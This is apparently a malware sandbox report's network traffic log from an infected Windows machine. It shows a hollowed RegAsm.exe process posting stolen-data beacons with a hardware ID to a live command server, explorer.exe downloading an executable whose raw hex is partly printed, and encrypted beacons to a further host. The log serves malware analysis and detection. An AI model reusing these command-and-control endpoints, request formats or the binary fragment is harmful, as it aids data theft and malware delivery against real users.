                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5ig02mzaZ%2F7iBldn1LqvSA%2BDcp4LPkTek8vO7RUtIStnJqS%2BRIz3zEmKqVkqb4mfYItt%2FDU9HgvpWVToTmYy6K%2BAnt95%2Bvvfl4ZZPvlBrA1whE9BwrkhDOjkcGm4xp0QDLIOfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f20dfb50805-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:13.707583904 CEST5503INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    17192.168.2.349840104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:13.917474031 CEST5505OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:13.917891026 CEST5505OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:14.389487982 CEST5508INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=sf131judmnorue812us3fh2riv; expires=Sat, 27 Jan 2024 01:41:53 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:14 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UmsHYpwyTcs1AJyBbXNfAl71Frqay7mBUneQzZCgHiLtXyryvieFXJo82jGtdz3rBrCPyRoBxrUol5ktu87xjh1i81BEAa%2F2e61XX83D90fi%2BdirLnF8ePm6FvzNDtkmfi70rA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f243ee17fae-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:14.389511108 CEST5508INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    18192.168.2.349842172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:14.607033968 CEST5510OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:14.607455015 CEST5510OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:15.286675930 CEST5515INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=ll8gt8tphlrd6tfr72mc8gjsb6; expires=Sat, 27 Jan 2024 01:41:53 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:14 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2Y0%2FLJSQv0nS%2BW04BFt5PjQWcLYDHXeFESrVTgP1SJSJOhkMAFsCepgWXUUfJKdkduhvsSrUewOHiA8oO6%2Fk75DcNoYI0D6MxofQNJSDTWYWrrWmZ9%2Bq9GeuAJItvKaoqOExCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f28890a3ad5-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:15.287029982 CEST5515INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    19192.168.2.349843193.149.185.13980C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:15.285729885 CEST5514OUTGET /ofdskiewerews/update.exe HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Host: 193.149.185.139
                                                                    Oct 3, 2023 09:55:15.453424931 CEST5517INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:15 GMT
                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                    Last-Modified: Tue, 03 Oct 2023 07:15:06 GMT
                                                                    ETag: "98800-606caa6821478"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 624640
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-msdos-program
                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3d 6a 10 68 79 0b 7e 3b 79 0b 7e 3b 79 0b 7e 3b aa 79 7d 3a 72 0b 7e 3b aa 79 7b 3a e9 0b 7e 3b aa 79 7a 3a 6d 0b 7e 3b 36 77 7a 3a 68 0b 7e 3b aa 79 7f 3a 70 0b 7e 3b 79 0b 7f 3b f4 0b 7e 3b 36 77 7b 3a 47 0b 7e 3b 36 77 7d 3a 6f 0b 7e 3b b8 77 7b 3a 78 0b 7e 3b b8 77 7e 3a 78 0b 7e 3b b8 77 81 3b 78 0b 7e 3b b8 77 7c 3a 78 0b 7e 3b 52 69 63 68 79 0b 7e 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cc be 1b 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 22 00 78 01 00 00 18 08 00 00 00 00 00 88 62 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 09 00 00 04 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 1c 02 00 50 00 00 00 c0 1c 02 00 64 00 00 00 00 a0 09 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 09 00 68 19 00 00 b0 fb 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 01 00 18 00 00 00 f0 fa 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 09 76 01 00 00 10 00 00 00 78 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 96 00 00 00 90 01 00 00 96 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 65 07 00 00 30 02 00 00 5a 07 00 00 12 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 a0 09 00 00 02 00 00 00 6c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 19 00 00 00 b0 09 00 00 1a 00 00 00 6e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=jhy~;y~;y~;y}:r~;y{:~;yz:m~;6wz:h~;y:p~;y;~;6w{:G~;6w}:o~;w{:x~;w~:x~;w;x~;w|:x~;Richy~;PELe"xb@@pPdh@.textvx `.rdata|@@.datae0Z@.rsrcl@@.relochn@B
                                                                    Oct 3, 2023 09:55:15.453527927 CEST5518INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 08 b8 92 83 41 00 e8 70 4f 00 00 b8 d4 72 49 00 c7 45 f0 78 72 49 00 89 45 ec 83 65 fc 00 c7 05 d4 72 49
                                                                    Data Ascii: jApOrIExrIEerI(AEhBPhrI&=MhAMOjAOlrIErIEelrIDAEhDBPhrI<MhALNhIWB$ALY
                                                                    Oct 3, 2023 09:55:15.453910112 CEST5519INData Raw: 89 47 04 b0 01 eb 02 32 c0 5f 5e c2 04 00 83 ec 0c 8b cc ff 74 24 18 e8 81 0a 00 00 8b 44 24 14 8b 4c 24 10 ff 30 e8 9a 05 00 00 c3 83 7c 24 04 00 56 8b f1 74 23 ff 74 24 08 e8 a1 14 00 00 8b 44 24 10 56 ff 36 ff 30 8b 44 24 18 ff 30 e8 1d 02 00
                                                                    Data Ascii: G2_^t$D$L$0|$Vt#t$D$V60D$0F^T$Bt@BAVt$W|$+|$Wt$VFU7_^L$D$t$PQUE=rEPEPEYYPuREYY]D$t0u+Vh
                                                                    Oct 3, 2023 09:55:15.453953028 CEST5521INData Raw: 46 74 88 46 76 8b 44 24 08 89 46 78 8b c6 5e c2 04 00 56 6a 01 8b f1 e8 f6 01 00 00 ff 74 24 08 8d 4e 6c c7 06 68 93 41 00 83 21 00 83 61 04 00 e8 5a fd ff ff 8b c6 5e c2 04 00 56 ff 74 24 08 8b f1 e8 8e fe ff ff 59 50 8b ce e8 67 01 00 00 e8 a8
                                                                    Data Ascii: FtFvD$Fx^Vjt$NlhA!aZ^Vt$YPg^Vt$D$AF^Vt$NA!a^!Vt$;tF&AD$A^VWD$P&f|D$$t$FpL$
                                                                    Oct 3, 2023 09:55:15.454030991 CEST5522INData Raw: 33 ff ff ff c7 06 c4 92 41 00 8b c6 5e c2 04 00 56 ff 74 24 08 8b f1 e8 44 ff ff ff c7 06 c4 92 41 00 8b c6 5e c2 04 00 56 ff 74 24 08 8b f1 e8 03 ff ff ff c7 06 68 92 41 00 8b c6 5e c2 04 00 56 ff 74 24 08 8b f1 e8 eb fe ff ff c7 06 74 92 41 00
                                                                    Data Ascii: 3A^Vt$DA^Vt$hA^Vt$tA^D$VxrPtA^Vt$tA^Vt$WV'gFG_^Vt$%A^UrI3EVMhAuEPu
                                                                    Oct 3, 2023 09:55:15.454102039 CEST5523INData Raw: 85 c9 74 05 e8 3f 0a 00 00 83 4d fc ff 8b 4d e0 85 c9 74 05 e8 2f 0a 00 00 e8 51 3b 00 00 c3 8d 45 e8 50 e8 07 0a 00 00 59 8d 45 e8 50 8b 4d dc e8 de 07 00 00 8d 45 e8 50 e8 a8 2a 00 00 59 b8 f3 23 40 00 c3 cc cc cc cc cc 8b 49 24 85 c9 0f 84 42
                                                                    Data Ascii: t?MMt/Q;EPYEPMEP*Y#@I$B `|$tt$m1jt$6VD$tj|V6YY^VNlD$tjtVb6YY^VD$thV@6YY^VNtT
                                                                    Oct 3, 2023 09:55:15.454165936 CEST5525INData Raw: 50 ff 75 1c ff 55 30 8b 83 28 30 42 00 03 c6 57 89 87 b0 00 00 00 ff 75 20 ff 55 0c 68 b4 2e d6 05 ff 35 a0 88 49 00 e8 f2 15 00 00 59 59 ff 75 20 ff d0 8b 4d 74 5f 5e 33 cd 5b e8 1b 36 00 00 83 c5 78 c9 c3 55 8b ec 51 51 56 8b f1 8d 4d f8 57 8d
                                                                    Data Ascii: PuU0(0BWu Uh.5IYYu Mt_^3[6xUQQVMWF(PX}uV)YY9~d|}_^tu(YD$L$#P+wifUEEH$PM]VW|$?wWF_F^\
                                                                    Oct 3, 2023 09:55:15.454236984 CEST5526INData Raw: 19 89 59 04 e8 6e e9 ff ff 8b 0e e8 ef 06 00 00 8b 4d 10 85 c9 74 05 e8 20 00 00 00 5f 5e 5b c9 c2 10 00 ff 74 24 04 e8 c3 1f 00 00 ff 74 24 08 e8 c9 1f 00 00 8b 44 24 0c 59 59 c3 56 57 83 cf ff 8b f1 8b c7 f0 0f c1 46 04 75 15 8b 06 ff 10 f0 0f
                                                                    Data Ascii: YnMt _^[t$t$D$YYVWFu~Ou_^`_^ItAu`QxtQj|$tjQr,YYVj+|$tjVT,YY^VN|$tj0V4,YY^tjPS
                                                                    Oct 3, 2023 09:55:15.454273939 CEST5527INData Raw: ec e4 ff ff 83 c4 0c 83 f8 02 75 25 8d 77 34 56 e8 08 1f 00 00 50 e8 49 f9 ff ff 56 c6 47 64 01 e8 1d 1f 00 00 8d 47 0c 50 e8 a9 1f 00 00 83 c4 10 8b cf 5f 5e 5b e9 24 02 00 00 55 8b ec 83 ec 2c a1 ec 72 49 00 33 c5 89 45 fc 8b 45 0c 8d 4d d4 56
                                                                    Data Ascii: u%w4VPIVGdGP_^[$U,rI3EEMVuPf$EPYMF$M3^+UrI3E}$VutWAWzYPWM_MUuRP}EuCEMPMEPM
                                                                    Oct 3, 2023 09:55:15.454312086 CEST5529INData Raw: 0a 00 00 5d c2 08 00 6a 0c b8 bd 81 41 00 e8 d3 27 00 00 89 4d ec 83 65 fc 00 ff 75 0c ff 75 08 83 c1 50 e8 a6 ff ff ff 83 4d fc ff e8 26 27 00 00 c2 08 00 b8 3c 38 40 00 c3 eb ec b8 44 38 40 00 c3 eb e4 8b 75 ec 83 7e 0c 00 75 1f 8d 45 e8 50 e8
                                                                    Data Ascii: ]jA'MeuuPM&'<8@D8@u~uEPYEPEPcY*8@VWw(VPD$YY9Gd}GdW3VYY_^T$BPUQQVMFPuEPQQMQPY
                                                                    Oct 3, 2023 09:55:15.620626926 CEST5532INData Raw: 0c 32 c0 5f 5e 5d c2 0c 00 ff 74 24 0c ff 74 24 0c ff 74 24 0c e8 8e 2d 00 00 8b 44 24 10 83 c4 0c c3 ff 74 24 04 e8 e6 f0 ff ff 8b 44 24 08 59 c3 56 33 f6 39 74 24 0c 0f 86 3e 01 00 00 53 8b 1d 00 90 41 00 57 8b 7c 24 10 ff d3 80 04 3e 7e ff d3
                                                                    Data Ascii: 2_^]t$t$t$-D$t$D$YV39t$>SAW|$>~>4>^>>>>4>j>S>4>>>>>>4>>x>>>>>N>|>4>>>&


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.349805200.92.136.25480C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:54:22.861876965 CEST1537OUTPOST /tmp/ HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://fviqib.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 293
                                                                    Host: gudintas.at
                                                                    Oct 3, 2023 09:54:22.861905098 CEST1538OUTData Raw: 3b 6e 52 62 f2 c2 1e 26 d6 db c6 07 04 74 0b cc 0c 03 c0 96 1a 05 92 64 0e 75 72 e2 30 c6 b1 6e 9b 2b c3 5d 01 6a 51 69 e9 9d 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 67 1c a1 e2
                                                                    Data Ascii: ;nRb&tdur0n+]jQi?*$`7C[zqNA -[k,vugcAd{_iiJ8L~z3R_2M0K3)hE"EcnE|#@gHS"^+(zFTkouS!
                                                                    Oct 3, 2023 09:54:23.650286913 CEST1538INHTTP/1.0 404 Not Found
                                                                    Date: Tue, 03 Oct 2023 07:54:23 GMT
                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                    X-Powered-By: PHP/7.4.15
                                                                    Content-Length: 331
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    20192.168.2.349845172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:15.508487940 CEST5530OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:15.508965015 CEST5531OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:15.834764004 CEST5612INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=vfoga0bl3vvkcsqppsb32pv12i; expires=Sat, 27 Jan 2024 01:41:54 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:15 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L5KJIntOup%2FcUeqnl8dAjBJMQKmkx%2BUc7me3yNGb8RcU8QjobEt%2BdQ5c1hbUF2xWsCI6APknguZsFsG6Xf9DXCW0qdzASCk%2B4rLSUQrE0dKTsI0c7B2%2BKJNHeYTlpeTgJcSvEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f2e2f68082b-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:15.834840059 CEST5613INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    21192.168.2.349847172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:16.044003963 CEST5683OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:16.044611931 CEST5683OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:17.658610106 CEST6188INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=85v6p1mnp1hadi3fmp04torli5; expires=Sat, 27 Jan 2024 01:41:56 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:17 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bDdjvkwpSdZGZrJsJAHVVIdwkhkqOQuWs9BLZEpQrgXxNdh7uP8jE9Y16ymD6PuFtOIxqjSsYcBxv1N3I%2B5daJiLXEGNmfRpRYJ0SDK2sTs3P29PhXlis8%2B1T%2BYGPGOLNly01g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f317dc99c7c-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:17.658628941 CEST6188INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    22192.168.2.349849180.94.156.6180C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:17.246929884 CEST6178OUTPOST /tmp/ HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://mqsawjuwq.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 110
                                                                    Host: gudintas.at
